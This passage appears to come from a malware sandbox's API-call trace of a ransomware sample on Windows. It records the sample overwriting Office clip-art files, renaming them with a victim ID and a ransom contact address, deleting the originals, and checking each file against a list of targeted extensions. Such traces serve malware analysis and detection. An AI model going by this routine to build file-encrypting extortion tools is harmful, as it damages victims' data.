dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0191.139] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0191.140] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0191.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151581.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0191.143] GetLastError () returned 0x0 [0191.143] ReadFile (in: hFile=0x380, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x2a00, lpOverlapped=0x0) returned 1 [0194.466] WriteFile (in: hFile=0x388, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x2a10, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x2a10, lpOverlapped=0x0) returned 1 [0195.693] ReadFile (in: hFile=0x380, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0195.693] WriteFile (in: hFile=0x388, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0195.693] SetEndOfFile (hFile=0x388) returned 1 [0195.693] CloseHandle (hObject=0x388) returned 1 [0195.693] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.693] SetEndOfFile (hFile=0x380) returned 1 [0195.694] CloseHandle (hObject=0x380) returned 1 [0195.694] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0195.892] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151581.wmf")) returned 1 [0196.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF") returned 68 [0196.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF") returned 68 [0196.383] lstrlenW (lpString=".doc") returned 4 [0196.383] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.383] lstrlenW (lpString=".docx") returned 5 [0196.383] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0196.383] lstrlenW (lpString=".pdf") returned 4 [0196.383] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.383] lstrlenW (lpString=".xls") returned 4 [0196.383] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.383] lstrlenW (lpString=".xlsx") returned 5 [0196.383] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0196.383] lstrlenW (lpString=".ppt") returned 4 [0196.383] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF") returned 68 [0196.383] lstrlenW (lpString=".zip") returned 4 [0196.383] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.383] lstrlenW (lpString=".rar") returned 4 [0196.383] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.383] lstrlenW (lpString=".bz2") returned 4 [0196.383] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.383] lstrlenW (lpString=".7z") returned 3 [0196.383] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF") returned 68 [0196.384] lstrlenW (lpString=".dbf") returned 4 [0196.384] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF") returned 68 [0196.384] lstrlenW (lpString=".1cd") returned 4 [0196.384] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF") returned 68 [0196.384] lstrlenW (lpString=".jpg") returned 4 [0196.384] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF") returned 68 [0196.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF") returned 68 [0196.384] lstrlenW (lpString=".doc") returned 4 [0196.384] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.384] lstrlenW (lpString=".docx") returned 5 [0196.384] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0196.384] lstrlenW (lpString=".pdf") returned 4 [0196.384] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.384] lstrlenW (lpString=".xls") returned 4 [0196.384] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.384] lstrlenW (lpString=".xlsx") returned 5 [0196.384] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0196.384] lstrlenW (lpString=".ppt") returned 4 [0196.384] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF") returned 68 [0196.384] lstrlenW (lpString=".zip") returned 4 [0196.385] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.385] lstrlenW (lpString=".rar") returned 4 [0196.385] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.385] lstrlenW (lpString=".bz2") returned 4 [0196.385] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.385] lstrlenW (lpString=".7z") returned 3 [0196.385] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF") returned 68 [0196.385] lstrlenW (lpString=".dbf") returned 4 [0196.385] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF") returned 68 [0196.385] lstrlenW (lpString=".1cd") returned 4 [0196.385] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151581.WMF") returned 68 [0196.385] lstrlenW (lpString=".jpg") returned 4 [0196.385] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.398] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.398] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152610.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.399] GetLastError () returned 0x0 [0196.399] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1748, lpOverlapped=0x0) returned 1 [0196.400] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1750, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1750, lpOverlapped=0x0) returned 1 [0196.401] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.401] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.401] SetEndOfFile (hFile=0x3a0) returned 1 [0196.402] CloseHandle (hObject=0x3a0) returned 1 [0196.402] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.402] SetEndOfFile (hFile=0x334) returned 1 [0196.403] CloseHandle (hObject=0x334) returned 1 [0196.403] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.403] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152610.wmf")) returned 1 [0196.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF") returned 68 [0196.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF") returned 68 [0196.404] lstrlenW (lpString=".doc") returned 4 [0196.404] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.404] lstrlenW (lpString=".docx") returned 5 [0196.404] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0196.404] lstrlenW (lpString=".pdf") returned 4 [0196.404] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.404] lstrlenW (lpString=".xls") returned 4 [0196.404] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.404] lstrlenW (lpString=".xlsx") returned 5 [0196.404] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0196.404] lstrlenW (lpString=".ppt") returned 4 [0196.405] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF") returned 68 [0196.405] lstrlenW (lpString=".zip") returned 4 [0196.405] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.405] lstrlenW (lpString=".rar") returned 4 [0196.405] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.405] lstrlenW (lpString=".bz2") returned 4 [0196.405] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.405] lstrlenW (lpString=".7z") returned 3 [0196.405] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF") returned 68 [0196.405] lstrlenW (lpString=".dbf") returned 4 [0196.405] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF") returned 68 [0196.405] lstrlenW (lpString=".1cd") returned 4 [0196.405] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF") returned 68 [0196.405] lstrlenW (lpString=".jpg") returned 4 [0196.405] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.406] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.407] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152622.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.407] GetLastError () returned 0x0 [0196.407] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x2584, lpOverlapped=0x0) returned 1 [0196.409] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x2590, lpOverlapped=0x0) returned 1 [0196.411] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.411] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.411] SetEndOfFile (hFile=0x3a0) returned 1 [0196.412] CloseHandle (hObject=0x3a0) returned 1 [0196.412] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.412] SetEndOfFile (hFile=0x334) returned 1 [0196.413] CloseHandle (hObject=0x334) returned 1 [0196.413] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.413] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152622.wmf")) returned 1 [0196.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF") returned 68 [0196.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF") returned 68 [0196.414] lstrlenW (lpString=".doc") returned 4 [0196.414] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.414] lstrlenW (lpString=".docx") returned 5 [0196.414] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0196.414] lstrlenW (lpString=".pdf") returned 4 [0196.414] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.414] lstrlenW (lpString=".xls") returned 4 [0196.414] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.414] lstrlenW (lpString=".xlsx") returned 5 [0196.414] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0196.414] lstrlenW (lpString=".ppt") returned 4 [0196.414] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF") returned 68 [0196.414] lstrlenW (lpString=".zip") returned 4 [0196.414] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.414] lstrlenW (lpString=".rar") returned 4 [0196.414] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.414] lstrlenW (lpString=".bz2") returned 4 [0196.414] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.414] lstrlenW (lpString=".7z") returned 3 [0196.414] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF") returned 68 [0196.415] lstrlenW (lpString=".dbf") returned 4 [0196.415] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF") returned 68 [0196.415] lstrlenW (lpString=".1cd") returned 4 [0196.415] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF") returned 68 [0196.415] lstrlenW (lpString=".jpg") returned 4 [0196.415] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.415] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.415] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152626.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.416] GetLastError () returned 0x0 [0196.416] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x6688, lpOverlapped=0x0) returned 1 [0196.418] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x6690, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x6690, lpOverlapped=0x0) returned 1 [0196.419] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.419] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.419] SetEndOfFile (hFile=0x3a0) returned 1 [0196.419] CloseHandle (hObject=0x3a0) returned 1 [0196.419] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.420] SetEndOfFile (hFile=0x334) returned 1 [0196.420] CloseHandle (hObject=0x334) returned 1 [0196.420] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.420] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152626.wmf")) returned 1 [0196.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF") returned 68 [0196.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF") returned 68 [0196.421] lstrlenW (lpString=".doc") returned 4 [0196.421] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.421] lstrlenW (lpString=".docx") returned 5 [0196.421] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0196.421] lstrlenW (lpString=".pdf") returned 4 [0196.421] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.421] lstrlenW (lpString=".xls") returned 4 [0196.421] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.421] lstrlenW (lpString=".xlsx") returned 5 [0196.421] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0196.421] lstrlenW (lpString=".ppt") returned 4 [0196.421] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF") returned 68 [0196.421] lstrlenW (lpString=".zip") returned 4 [0196.421] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.421] lstrlenW (lpString=".rar") returned 4 [0196.421] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.421] lstrlenW (lpString=".bz2") returned 4 [0196.421] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.422] lstrlenW (lpString=".7z") returned 3 [0196.422] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF") returned 68 [0196.422] lstrlenW (lpString=".dbf") returned 4 [0196.422] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF") returned 68 [0196.422] lstrlenW (lpString=".1cd") returned 4 [0196.422] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF") returned 68 [0196.422] lstrlenW (lpString=".jpg") returned 4 [0196.422] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.422] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.422] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152628.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.423] GetLastError () returned 0x0 [0196.423] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x785c, lpOverlapped=0x0) returned 1 [0196.445] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x7860, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x7860, lpOverlapped=0x0) returned 1 [0196.447] ReadFile (in: hFile=0x334, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.447] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.447] SetEndOfFile (hFile=0x3a0) returned 1 [0196.447] CloseHandle (hObject=0x3a0) returned 1 [0196.447] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.447] SetEndOfFile (hFile=0x334) returned 1 [0196.448] CloseHandle (hObject=0x334) returned 1 [0196.448] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.448] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152628.wmf")) returned 1 [0196.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF") returned 68 [0196.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF") returned 68 [0196.449] lstrlenW (lpString=".doc") returned 4 [0196.449] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.449] lstrlenW (lpString=".docx") returned 5 [0196.449] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0196.449] lstrlenW (lpString=".pdf") returned 4 [0196.449] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.449] lstrlenW (lpString=".xls") returned 4 [0196.449] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.449] lstrlenW (lpString=".xlsx") returned 5 [0196.449] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0196.450] lstrlenW (lpString=".ppt") returned 4 [0196.450] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF") returned 68 [0196.450] lstrlenW (lpString=".zip") returned 4 [0196.450] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.450] lstrlenW (lpString=".rar") returned 4 [0196.450] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.450] lstrlenW (lpString=".bz2") returned 4 [0196.450] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.450] lstrlenW (lpString=".7z") returned 3 [0196.450] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF") returned 68 [0196.450] lstrlenW (lpString=".dbf") returned 4 [0196.450] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF") returned 68 [0196.450] lstrlenW (lpString=".1cd") returned 4 [0196.450] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.450] lstrlenW 